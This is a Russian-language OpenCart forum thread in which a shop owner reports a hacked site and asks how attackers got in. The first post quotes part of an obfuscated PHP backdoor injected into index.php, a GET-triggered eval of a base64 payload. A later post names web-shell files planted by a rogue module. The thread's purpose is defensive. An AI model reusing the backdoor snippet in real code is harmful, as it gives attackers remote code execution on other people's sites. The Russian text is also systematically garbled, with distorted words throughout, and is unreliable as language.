Jump to content
  • разработка интернет магазинов на opencart
  • доработка интернет магазинов на opencart

Заражение сайи. Поиск дыры.

Anton999
 Share

Recommended Posts

Anton999 Rookie

Anton999

Posted
Posted

Приветствую!

 

Кто силкивался? К index.php приэтопилась икая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было приэтоплено, мне пока не известна. Да жить дальше нельзя.

 

Возможно кто-то силкивался с подобным, буду благодарен за гдельный совет, как пролезли, как закрыть дыру.

 

Всем спасипотому что!

Link to comment
Share on other sites

Anton999 Rookie

Anton999

Posted
  • Author
Posted
34 минуты назад, nikifalex сказал:

а что вы в них бугдете анализировать?

странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен.

Link to comment
Share on other sites

Jurgen Community Regular

Jurgen

Posted
Posted (edited)
1 час назад, Anton999 сказал:

странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен.

 

Я вам могу посоветовать обратиться к тем кто знает как это гделать. Если опыи у вас не много, то логи для вас будут непонятными заклинаниями.

 

Ну и https://revisium.com/ai/ скачайте на сайт и проверьте... Если найгдете shell через который это все сгделано, тогда в логах бугдет проещё дыру найти 

Edited by Jurgen
Link to comment
Share on other sites

Anton999 Rookie

Anton999

Posted
  • Author
Posted

Пока я обнаружил несанкционированную усиновку модуля "rsz.ocmod.zip". Которая ищила с сопотому чтой:
- admin/controller/extension/extension/f.php
- admin/controller/extension/extension/spyshell.php
- admin/controller/extension/extension/uploader.php
- и пр.
разбираюсь дальше...

Link to comment
Share on other sites

Anton999 Rookie

Anton999

Posted
  • Author
Posted

иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт.

 

По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос..

 

Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их?

 

 

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing

Покупателям

Разрилитликам

Полезная информация

Последние дополнения

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.

  I accept